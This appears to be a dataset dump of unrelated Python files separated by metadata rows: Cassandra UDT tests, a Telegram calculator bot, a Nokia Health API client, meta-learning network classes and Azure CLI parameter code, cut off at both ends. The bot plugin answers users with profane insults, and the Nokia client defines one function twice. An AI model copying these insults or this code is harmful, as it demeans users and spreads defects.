result = s.execute("SELECT v_%s FROM mytable WHERE k=0", (i,))[0]
self.assertEqual(udt, result['v_%s' % i])
c.shutdown()
def test_non_existing_types(self):
c = Cluster(protocol_version=PROTOCOL_VERSION)
c.connect()
User = namedtuple('user', ('age', 'name'))
self.assertRaises(UserTypeDoesNotExist, c.register_user_type, "some_bad_keyspace", "user", User)
self.assertRaises(UserTypeDoesNotExist, c.register_user_type, "system", "user", User)
c.shutdown()
def test_primitive_datatypes(self):
"""
Test for inserting various types of DATA_TYPE_PRIMITIVES into UDT's
"""
c = Cluster(protocol_version=PROTOCOL_VERSION)
s = c.connect()
# create keyspace
s.execute("""
CREATE KEYSPACE test_primitive_datatypes
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("test_primitive_datatypes")
# create UDT
alpha_type_list = []
start_index = ord('a')
for i, datatype in enumerate(DATA_TYPE_PRIMITIVES):
alpha_type_list.append("{0} {1}".format(chr(start_index + i), datatype))
s.execute("""
CREATE TYPE alldatatypes ({0})
""".format(', '.join(alpha_type_list))
)
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<alldatatypes>)")
# register UDT
alphabet_list = []
for i in range(ord('a'), ord('a') + len(DATA_TYPE_PRIMITIVES)):
alphabet_list.append('{}'.format(chr(i)))
Alldatatypes = namedtuple("alldatatypes", alphabet_list)
c.register_user_type("test_primitive_datatypes", "alldatatypes", Alldatatypes)
# insert UDT data
params = []
for datatype in DATA_TYPE_PRIMITIVES:
params.append((get_sample(datatype)))
insert = s.prepare("INSERT INTO mytable (a, b) VALUES (?, ?)")
s.execute(insert, (0, Alldatatypes(*params)))
# retrieve and verify data
results = s.execute("SELECT * FROM mytable")
self.assertEqual(1, len(results))
row = results[0].b
for expected, actual in zip(params, row):
self.assertEqual(expected, actual)
c.shutdown()
def test_nonprimitive_datatypes(self):
"""
Test for inserting various types of DATA_TYPE_NON_PRIMITIVE into UDT's
"""
c = Cluster(protocol_version=PROTOCOL_VERSION)
s = c.connect()
# create keyspace
s.execute("""
CREATE KEYSPACE test_nonprimitive_datatypes
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("test_nonprimitive_datatypes")
# create UDT
alpha_type_list = []
start_index = ord('a')
for i, nonprim_datatype in enumerate(DATA_TYPE_NON_PRIMITIVE_NAMES):
for j, datatype in enumerate(DATA_TYPE_PRIMITIVES):
if nonprim_datatype == "map":
type_string = "{0}_{1} {2}<{3}, {3}>".format(chr(start_index + i), chr(start_index + j),
nonprim_datatype, datatype)
elif nonprim_datatype == "tuple":
type_string = "{0}_{1} frozen<{2}<{3}>>".format(chr(start_index + i), chr(start_index + j),
nonprim_datatype, datatype)
else:
type_string = "{0}_{1} {2}<{3}>".format(chr(start_index + i), chr(start_index + j),
nonprim_datatype, datatype)
alpha_type_list.append(type_string)
s.execute("""
CREATE TYPE alldatatypes ({0})
""".format(', '.join(alpha_type_list))
)
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<alldatatypes>)")
# register UDT
alphabet_list = []
for i in range(ord('a'), ord('a') + len(DATA_TYPE_NON_PRIMITIVE_NAMES)):
for j in range(ord('a'), ord('a') + len(DATA_TYPE_PRIMITIVES)):
alphabet_list.append('{0}_{1}'.format(chr(i), chr(j)))
Alldatatypes = namedtuple("alldatatypes", alphabet_list)
c.register_user_type("test_nonprimitive_datatypes", "alldatatypes", Alldatatypes)
# insert UDT data
params = []
for nonprim_datatype in DATA_TYPE_NON_PRIMITIVE_NAMES:
for datatype in DATA_TYPE_PRIMITIVES:
params.append((get_nonprim_sample(nonprim_datatype, datatype)))
insert = s.prepare("INSERT INTO mytable (a, b) VALUES (?, ?)")
s.execute(insert, (0, Alldatatypes(*params)))
# retrieve and verify data
results = s.execute("SELECT * FROM mytable")
self.assertEqual(1, len(results))
row = results[0].b
for expected, actual in zip(params, row):
self.assertEqual(expected, actual)
c.shutdown()
| 39.223583 | 116 | 0.601335 | 3,203 | 25,613 | 4.647206 | 0.089916 | 0.044071 | 0.045146 | 0.021767 | 0.837286 | 0.799059 | 0.776554 | 0.754182 | 0.735506 | 0.714007 | 0 | 0.013445 | 0.279858 | 25,613 | 652 | 117 | 39.283742 | 0.793548 | 0.129583 | 0 | 0.671533 | 0 | 0 | 0.315555 | 0.069053 | 0 | 0 | 0 | 0 | 0.107056 | 1 | 0.036496 | false | 0 | 0.021898 | 0 | 0.065693 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
acdc402b742f117467d8cefb45af5f6c10e1024c | 102 | py | Python | build/lib/federal_holiday/__init__.py | mmcelhan/federalholiday | 0b9667991a1045c00abe2e272af0e3eef7f39d45 | [
"MIT"
] | null | null | null | build/lib/federal_holiday/__init__.py | mmcelhan/federalholiday | 0b9667991a1045c00abe2e272af0e3eef7f39d45 | [
"MIT"
] | null | null | null | build/lib/federal_holiday/__init__.py | mmcelhan/federalholiday | 0b9667991a1045c00abe2e272af0e3eef7f39d45 | [
"MIT"
] | null | null | null | from .federal_holiday import holiday_name, is_federal_holiday, is_weekend, is_working_day, is_off_day
| 51 | 101 | 0.872549 | 17 | 102 | 4.705882 | 0.588235 | 0.35 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078431 | 102 | 1 | 102 | 102 | 0.851064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c5f49c765d6d5e809273e131d8b22f26a06b7e8d | 3,638 | py | Python | plugins/calculadora.py | gorpo/manicomio_bot_heroku | aa8dc217468d076f26604a209b5798642217c789 | [
"MIT"
] | null | null | null | plugins/calculadora.py | gorpo/manicomio_bot_heroku | aa8dc217468d076f26604a209b5798642217c789 | [
"MIT"
] | null | null | null | plugins/calculadora.py | gorpo/manicomio_bot_heroku | aa8dc217468d076f26604a209b5798642217c789 | [
"MIT"
] | null | null | null | import html
import re
import random
import amanobot
import aiohttp
from amanobot.exception import TelegramError
import time
from config import bot, sudoers, logs, bot_username
from utils import send_to_dogbin, send_to_hastebin
async def calculadora(msg):
if msg.get('text'):
if '+' in msg['text']:
n1 = int(msg['text'].split('+')[0])
n2 = int(msg['text'].split('+')[1])
calc = n1 + n2
print('Usuario {} solicitou a calculadora {}+{}={} '.format(msg['from']['first_name'],n1,n2,calc))
log = '\nUsuario {} solicitou a calculadora {}+{}={} --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],n1,n2,calc,msg['chat']['title'],time.ctime())
arquivo = open('logs/calc.txt','a')
arquivo.write(log)
arquivo.close()
await bot.sendMessage(msg['chat']['id'],'`Sua soma {}+{}={} {} seu pau no cu!`'.format(n1,n2,calc,msg['from']['first_name']), 'markdown',
reply_to_message_id=msg['message_id'])
return True
if '-' in msg['text']:
n1 = int(msg['text'].split('-')[0])
n2 = int(msg['text'].split('-')[1])
calc = n1 - n2
print('Usuario {} solicitou a calculadora {}-{}={}'.format(msg['from']['first_name'],n1,n2,calc))
log = '\nUsuario {} solicitou a calculadora {}-{}={} --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],n1,n2,calc,msg['chat']['title'],time.ctime())
arquivo = open('logs/calc.txt','a')
arquivo.write(log)
arquivo.close()
await bot.sendMessage(msg['chat']['id'],'`Sua subtração {}-{}={} {}seu filho da puta!`'.format(n1,n2,calc,msg['from']['first_name']), 'markdown',
reply_to_message_id=msg['message_id'])
return True
if '*' in msg['text']:
n1 = int(msg['text'].split('*')[0])
n2 = int(msg['text'].split('*')[1])
calc = n1 * n2
print('Usuario {} solicitou a calculadora {}*{}={}'.format(msg['from']['first_name'],n1,n2,calc))
log = '\nUsuario {} solicitou a calculadora {}*{}={} --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],n1,n2,calc,msg['chat']['title'],time.ctime())
arquivo = open('logs/calc.txt','a')
arquivo.write(log)
arquivo.close()
await bot.sendMessage(msg['chat']['id'],'`Sua multiplicação {}*{}={} {} seu arrombado do caralho!`'.format(n1,n2,calc,msg['from']['first_name']), 'markdown',
reply_to_message_id=msg['message_id'])
return True
if 'div' in msg['text']:
n1 = int(msg['text'].split('/')[0])
n2 = int(msg['text'].split('/')[1])
calc = n1 / n2
print('Usuario {} solicitou a calculadora {}/{}={}'.format(msg['from']['first_name'],n1,n2,calc))
log = '\nUsuario {} solicitou a calculadora {}/{}={} --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],n1,n2,calc,msg['chat']['title'],time.ctime())
arquivo = open('logs/calc.txt','a')
arquivo.write(log)
arquivo.close()
await bot.sendMessage(msg['chat']['id'],'`Sua divisão {}/{}={} {} seu lixo`'.format(n1,n2,calc,msg['from']['first_name']), 'markdown',
reply_to_message_id=msg['message_id'])
return True
| 53.5 | 177 | 0.502474 | 417 | 3,638 | 4.304556 | 0.191847 | 0.035655 | 0.080223 | 0.106964 | 0.826741 | 0.826741 | 0.826741 | 0.826741 | 0.826741 | 0.826741 | 0 | 0.018519 | 0.287521 | 3,638 | 68 | 178 | 53.5 | 0.673997 | 0 | 0 | 0.338983 | 0 | 0 | 0.302912 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.152542 | 0 | 0.220339 | 0.067797 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a8628e6e505fa0da43afb17b135825241d5e63bc | 2,373 | py | Python | client.py | a-r-i/nokiahealth_py | 8e78ed94051c7463ff1491b50fd572be724041ff | [
"MIT"
] | null | null | null | client.py | a-r-i/nokiahealth_py | 8e78ed94051c7463ff1491b50fd572be724041ff | [
"MIT"
] | null | null | null | client.py | a-r-i/nokiahealth_py | 8e78ed94051c7463ff1491b50fd572be724041ff | [
"MIT"
] | null | null | null | import requests
def get_accesstoken(client_id, client_secret, code, redirect_uri):
url = "https://account.health.nokia.com/oauth2/token"
payload = {
"grant_type": "authorization_code",
"client_id": client_id,
"client_secret": client_secret,
"code": code,
"redirect_uri": redirect_uri
}
r = requests.post(url, data=payload)
return r.json()
def refresh_accesstoken(client_id, client_secret, refresh_token):
url = "https://account.health.nokia.com/oauth2/token"
payload = {
"grant_type": "refresh_token",
"client_id": client_id,
"client_secret": client_secret,
"refresh_token": refresh_token
}
r = requests.post(url, data=payload)
return r.json()
def refresh_accesstoken(client_id, client_secret, refresh_token):
url = "https://account.health.nokia.com/oauth2/token"
payload = {
"grant_type": "refresh_token",
"client_id": client_id,
"client_secret": client_secret,
"refresh_token": refresh_token
}
r = requests.post(url, data=payload)
return r.json()
def get_sleep(access_token, startdate, enddate):
url = "https://api.health.nokia.com/v2/sleep?action=get"
payload = {
"access_token": access_token,
"startdate": startdate, # UNIXタイムスタンプで指定
"enddate": enddate # UNIXタイムスタンプで指定
}
r = requests.get(url, params=payload)
return r.json()
def get_summary(access_token, startdateymd, enddateymd):
url = "https://api.health.nokia.com/v2/sleep?action=getsummary"
payload = {
"access_token": access_token,
"startdateymd": startdateymd, # YYYY-MM-DD形式で指定
"enddateymd": enddateymd # YYYY-MM-DD形式で指定
}
r = requests.get(url, params=payload)
return r.json()
def get_meas(access_token, startdate, enddate):
url = "https://api.health.nokia.com/measure?action=getmeas"
payload = {
"access_token": access_token,
"startdate": startdate, # UNIXタイムスタンプで指定
"enddate": enddate # UNIXタイムスタンプで指定
}
r = requests.get(url, params=payload)
return r.json()
| 28.25 | 67 | 0.585756 | 248 | 2,373 | 5.41129 | 0.193548 | 0.053651 | 0.09389 | 0.089419 | 0.825633 | 0.780924 | 0.778689 | 0.778689 | 0.748882 | 0.710879 | 0 | 0.003008 | 0.299621 | 2,373 | 83 | 68 | 28.590361 | 0.804452 | 0.038348 | 0 | 0.677966 | 0 | 0 | 0.246593 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.101695 | false | 0 | 0.016949 | 0 | 0.220339 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a89930681ef324360c60437758352c93d81548ee | 46 | py | Python | pxolly/models/callback/__init__.py | lordralinc/pxolly_api | 8b55d299c67332cca0cfe19d4091e73ab5a028a6 | [
"MIT"
] | null | null | null | pxolly/models/callback/__init__.py | lordralinc/pxolly_api | 8b55d299c67332cca0cfe19d4091e73ab5a028a6 | [
"MIT"
] | null | null | null | pxolly/models/callback/__init__.py | lordralinc/pxolly_api | 8b55d299c67332cca0cfe19d4091e73ab5a028a6 | [
"MIT"
] | null | null | null | from .get_settings import CallbackGetSettings
| 23 | 45 | 0.891304 | 5 | 46 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 46 | 1 | 46 | 46 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a8d98c3b214fb887604ebc62fd1cd3f52a8ff4d7 | 9,584 | py | Python | boml/setup_model/meta_feat_v2.py | bmlsoc/PyBML | cc5dc8c3689a144776a5c77e9efcf8cdb6328e51 | [
"MIT"
] | 172 | 2020-08-15T01:56:30.000Z | 2022-03-19T16:49:14.000Z | boml/setup_model/meta_feat_v2.py | bmlsoc/PyBML | cc5dc8c3689a144776a5c77e9efcf8cdb6328e51 | [
"MIT"
] | 4 | 2020-09-07T14:58:04.000Z | 2020-12-20T11:53:32.000Z | boml/setup_model/meta_feat_v2.py | bmlsoc/PyBML | cc5dc8c3689a144776a5c77e9efcf8cdb6328e51 | [
"MIT"
] | 32 | 2020-09-05T02:13:32.000Z | 2022-03-19T16:49:35.000Z | # MIT License
# Copyright (c) 2020 Yaohua Liu
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
The base class in setup_model to encapsulate Residual Block for meta-feature-based methods.
"""
from collections import OrderedDict
import tensorflow as tf
from tensorflow.contrib import layers as tcl
import boml.extension
from boml.setup_model import network_utils
from boml.setup_model.network import BOMLNet
class BOMLNetMiniMetaFeatV2(BOMLNet):
def __init__(
self,
_input,
name="BOMLNetMiniMetaFeatV2",
outer_param_dict=OrderedDict(),
dim_output=-1,
model_param_dict=OrderedDict(),
task_parameter=OrderedDict(),
use_t=False,
use_warp=False,
reuse=False,
outer_method="Reverse",
):
"""
:param _input: original input
:param dim_output: dimension of output
:param name: scope of meta-learner
:param outer_param_dict: dictionary of outer parameters
:param model_param_dict:dictonary of model parameters for specific algorithms such t-layer or warp-layer
:param task_parameter: dictionary of task-specific parameters or temporary values of task-specific parameters
:param use_t: Boolean, whether to use t-layer for neural network construction
:param use_warp: Boolean, whether to use warp-layer for neural network construction
:param outer_method: the name of outer method
:param reuse: Boolean, whether to reuse the parameters
"""
self.var_coll = boml.extension.METAPARAMETERS_COLLECTIONS
self.task_paramter = task_parameter
self.outer_method = outer_method
self.dim_output = dim_output
self.use_t = use_t
self.use_warp = use_warp
super().__init__(
_input=_input,
outer_param_dict=outer_param_dict,
model_param_dict=model_param_dict,
name=name,
reuse=reuse,
)
self.betas = self.filter_vars("beta")
self.moving_means = self.filter_vars("moving_mean")
self.moving_variances = self.filter_vars("moving_variance")
if not reuse:
boml.extension.remove_from_collection(
boml.extension.GraphKeys.MODEL_VARIABLES,
*self.moving_means,
*self.moving_variances
)
boml.extension.remove_from_collection(
boml.extension.GraphKeys.METAPARAMETERS,
*self.moving_means,
*self.moving_variances
)
print(name, "MODEL CREATED")
def _forward(self):
"""
_forward() uses defined convolutional neural networks with initial input
:return:
"""
def residual_block(x, n_filters):
skip_c = tcl.conv2d(x, n_filters, 1, activation_fn=None)
def conv_block(xx):
out = tcl.conv2d(
xx,
n_filters,
3,
activation_fn=None,
normalizer_fn=tcl.batch_norm,
variables_collections=self.var_coll,
)
return network_utils.leaky_relu(out, 0.1)
out = x
for _ in range(3):
out = conv_block(out)
add = tf.add(skip_c, out)
return tf.nn.max_pool(add, [1, 2, 2, 1], [1, 2, 2, 1], "SAME")
self + residual_block(self.out, 64)
self + residual_block(self.out, 96)
self + residual_block(self.out, 128)
self + residual_block(self.out, 256)
self + tcl.conv2d(self.out, 2048, 1, variables_collections=self.var_coll)
self + tf.nn.avg_pool(self.out, [1, 6, 6, 1], [1, 6, 6, 1], "VALID")
self + tcl.conv2d(self.out, 512, 1, variables_collections=self.var_coll)
self + tf.reshape(self.out, (-1, 512))
def re_forward(self, new_input=None):
"""
reuses defined convolutional networks with new input and update the output results
:param new_input: new input with same shape as the old one
:param task_parameter: the dictionary of task-specific
:return: updated instance of BOMLNet
"""
return BOMLNetMiniMetaFeatV2(
_input=new_input if new_input is not None else self.layers[0],
model_param_dict=self.model_param_dict,
name=self.name,
dim_output=self.dim_output,
outer_param_dict=self.outer_param_dict,
reuse=tf.AUTO_REUSE,
outer_method=self.outer_method,
use_t=self.use_t,
)
class BOMLNetOmniglotMetaFeatV2(BOMLNet):
def __init__(
self,
_input,
name="BOMLNetOmniglotMetaFeatV2",
outer_param_dict=OrderedDict(),
dim_output=-1,
model_param_dict=OrderedDict(),
use_t=False,
use_warp=False,
reuse=False,
outer_method="Reverse",
):
"""
:param _input: original input
:param dim_output: dimension of output
:param name: scope of meta-learner
:param outer_param_dict: dictionary of outer parameters
:param model_param_dict:dictonary of model parameters for specific algorithms such t-layer or warp-layer
:param use_t: Boolean, whether to use t-layer for neural network construction
:param use_warp: Boolean, whether to use warp-layer for neural network construction
:param outer_method: the name of outer method
:param reuse: Boolean, whether to reuse the parameters
"""
self.var_coll = boml.extension.METAPARAMETERS_COLLECTIONS
self.outer_method = outer_method
self.dim_output = dim_output
self.use_t = use_t
self.use_warp = use_warp
super().__init__(
_input=_input,
outer_param_dict=outer_param_dict,
model_param_dict=model_param_dict,
name=name,
reuse=reuse,
)
self.betas = self.filter_vars("beta")
self.moving_means = self.filter_vars("moving_mean")
self.moving_variances = self.filter_vars("moving_variance")
if not reuse:
boml.extension.remove_from_collection(
boml.extension.GraphKeys.MODEL_VARIABLES,
*self.moving_means,
*self.moving_variances
)
boml.extension.remove_from_collection(
boml.extension.GraphKeys.METAPARAMETERS,
*self.moving_means,
*self.moving_variances
)
print(name, "MODEL CREATED")
def _forward(self):
"""
_forward() uses defined convolutional neural networks with initial input
:return:
"""
def residual_block(x, n_filters):
skip_c = tcl.conv2d(x, n_filters, 1, activation_fn=None)
def conv_block(xx):
out = tcl.conv2d(
xx,
n_filters,
3,
activation_fn=None,
normalizer_fn=tcl.batch_norm,
variables_collections=self.var_coll,
)
return network_utils.leaky_relu(out, 0.1)
out = x
for _ in range(3):
out = conv_block(out)
add = tf.add(skip_c, out)
return tf.nn.max_pool(add, [1, 2, 2, 1], [1, 2, 2, 1], "SAME")
self + residual_block(self.out, 64)
self + residual_block(self.out, 96)
self + tcl.conv2d(self.out, 2048, 1, variables_collections=self.var_coll)
self + tf.nn.avg_pool(self.out, [1, 6, 6, 1], [1, 6, 6, 1], "VALID")
self + tcl.conv2d(self.out, 512, 1, variables_collections=self.var_coll)
self + tf.reshape(self.out, (-1, 512))
def re_forward(self, new_input=None, task_parameter=OrderedDict()):
"""
reuses defined convolutional networks with new input and update the output results
:param new_input: new input with same shape as the old one
:param task_parameter: the dictionary of task-specific
:return: updated instance of BOMLNet
"""
return BOMLNetOmniglotMetaFeatV2(
new_input if new_input is not None else self.layers[0],
model_param_dict=self.model_param_dict,
name=self.name,
dim_output=self.dim_output,
outer_param_dict=self.outer_param_dict,
reuse=tf.AUTO_REUSE,
use_t=self.use_t,
outer_method=self.outer_method,
)
| 37.584314 | 117 | 0.62573 | 1,190 | 9,584 | 4.844538 | 0.194958 | 0.037467 | 0.029141 | 0.019775 | 0.752472 | 0.731657 | 0.72229 | 0.72229 | 0.72229 | 0.72229 | 0 | 0.015412 | 0.29591 | 9,584 | 254 | 118 | 37.732283 | 0.838915 | 0.308118 | 0 | 0.8125 | 0 | 0 | 0.02616 | 0.007338 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.0375 | 0 | 0.15 | 0.0125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
763da60785b68db90621f072b34dc3cffcd9ae8f | 47 | py | Python | test_project/tests/fixtures/__init__.py | wishmaestro/drf-fat-models | 09b8c8a15140044e570db4e9af3354c42768ec5c | [
"MIT"
] | null | null | null | test_project/tests/fixtures/__init__.py | wishmaestro/drf-fat-models | 09b8c8a15140044e570db4e9af3354c42768ec5c | [
"MIT"
] | null | null | null | test_project/tests/fixtures/__init__.py | wishmaestro/drf-fat-models | 09b8c8a15140044e570db4e9af3354c42768ec5c | [
"MIT"
] | null | null | null | from .customers import *
from .orders import *
| 15.666667 | 24 | 0.744681 | 6 | 47 | 5.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 47 | 2 | 25 | 23.5 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
763fde9d67a0b1d98cec20b941f6e3efb64cdcb3 | 521 | py | Python | flow/scenarios/traffic_light_grid.py | SHITIANYU-hue/flow | 6fb5697868517fea7098a81b78c1be8e925f09f7 | [
"MIT"
] | 805 | 2018-08-16T22:30:51.000Z | 2022-03-31T09:25:50.000Z | flow/scenarios/traffic_light_grid.py | SHITIANYU-hue/flow | 6fb5697868517fea7098a81b78c1be8e925f09f7 | [
"MIT"
] | 879 | 2018-08-22T17:37:06.000Z | 2022-03-29T01:06:11.000Z | flow/scenarios/traffic_light_grid.py | SHITIANYU-hue/flow | 6fb5697868517fea7098a81b78c1be8e925f09f7 | [
"MIT"
] | 325 | 2018-08-22T06:48:00.000Z | 2022-03-21T15:09:04.000Z | """Pending deprecation file.
To view the actual content, go to: flow/networks/traffic_light_grid.py
"""
from flow.utils.flow_warnings import deprecated
from flow.networks.traffic_light_grid import TrafficLightGridNetwork
from flow.networks.traffic_light_grid import ADDITIONAL_NET_PARAMS # noqa: F401
@deprecated('flow.scenarios.traffic_light_grid',
'flow.networks.traffic_light_grid.TrafficLightGridNetwork')
class TrafficLightGridScenario(TrafficLightGridNetwork):
"""See parent class."""
pass
| 32.5625 | 80 | 0.802303 | 62 | 521 | 6.532258 | 0.516129 | 0.148148 | 0.197531 | 0.237037 | 0.325926 | 0.187654 | 0.187654 | 0 | 0 | 0 | 0 | 0.006508 | 0.115163 | 521 | 15 | 81 | 34.733333 | 0.872017 | 0.243762 | 0 | 0 | 0 | 0 | 0.232984 | 0.232984 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.142857 | 0.428571 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
76633d401362f455c662bf00a01b0c66c0125e68 | 48,981 | py | Python | src/datafactory/azext_datafactory/generated/_params.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 207 | 2017-11-29T06:59:41.000Z | 2022-03-31T10:00:53.000Z | src/datafactory/azext_datafactory/generated/_params.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 4,061 | 2017-10-27T23:19:56.000Z | 2022-03-31T23:18:30.000Z | src/datafactory/azext_datafactory/generated/_params.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 802 | 2017-10-11T17:36:26.000Z | 2022-03-31T22:24:32.000Z | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
from azure.cli.core.commands.parameters import (
tags_type,
get_three_state_flag,
get_enum_type,
resource_group_name_type,
get_location_type
)
from azure.cli.core.commands.validators import (
get_default_location_from_resource_group,
validate_file_or_dict
)
from azext_datafactory.action import (
AddFactoryVstsConfiguration,
AddFactoryGitHubConfiguration,
AddFolder,
AddFilters,
AddOrderBy
)
def load_arguments(self, _):
with self.argument_context('datafactory list') as c:
c.argument('resource_group_name', resource_group_name_type)
with self.argument_context('datafactory show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', options_list=['--name', '-n', '--factory-name'], type=str, help='The factory name.',
id_part='name')
c.argument('if_none_match', type=str, help='ETag of the factory entity. Should only be specified for get. If '
'the ETag matches the existing entity tag, or if * was provided, then no content will be returned.')
with self.argument_context('datafactory create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', options_list=['--name', '-n', '--factory-name'], type=str,
help='The factory name.')
c.argument('if_match', type=str, help='ETag of the factory entity. Should only be specified for update, for '
'which it should match existing entity or can be * for unconditional update.')
c.argument('location', arg_type=get_location_type(self.cli_ctx), required=False,
validator=get_default_location_from_resource_group)
c.argument('tags', tags_type)
c.argument('factory_vsts_configuration', action=AddFactoryVstsConfiguration, nargs='+', help='Factory\'s VSTS '
'repo information.', arg_group='RepoConfiguration')
c.argument('factory_git_hub_configuration', action=AddFactoryGitHubConfiguration, nargs='+', help='Factory\'s '
'GitHub repo information.', arg_group='RepoConfiguration')
c.argument('global_parameters', type=validate_file_or_dict, help='List of parameters for factory. Expected '
'value: json-string/json-file/@json-file.')
with self.argument_context('datafactory update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', options_list=['--name', '-n', '--factory-name'], type=str, help='The factory name.',
id_part='name')
c.argument('tags', tags_type)
with self.argument_context('datafactory delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', options_list=['--name', '-n', '--factory-name'], type=str, help='The factory name.',
id_part='name')
with self.argument_context('datafactory configure-factory-repo') as c:
c.argument('location', arg_type=get_location_type(self.cli_ctx), id_part='name')
c.argument('factory_resource_id', type=str, help='The factory resource id.')
c.argument('factory_vsts_configuration', action=AddFactoryVstsConfiguration, nargs='+', help='Factory\'s VSTS '
'repo information.', arg_group='RepoConfiguration')
c.argument('factory_git_hub_configuration', action=AddFactoryGitHubConfiguration, nargs='+', help='Factory\'s '
'GitHub repo information.', arg_group='RepoConfiguration')
with self.argument_context('datafactory get-data-plane-access') as c:
c.argument('resource_group_name', resource_group_name_type)
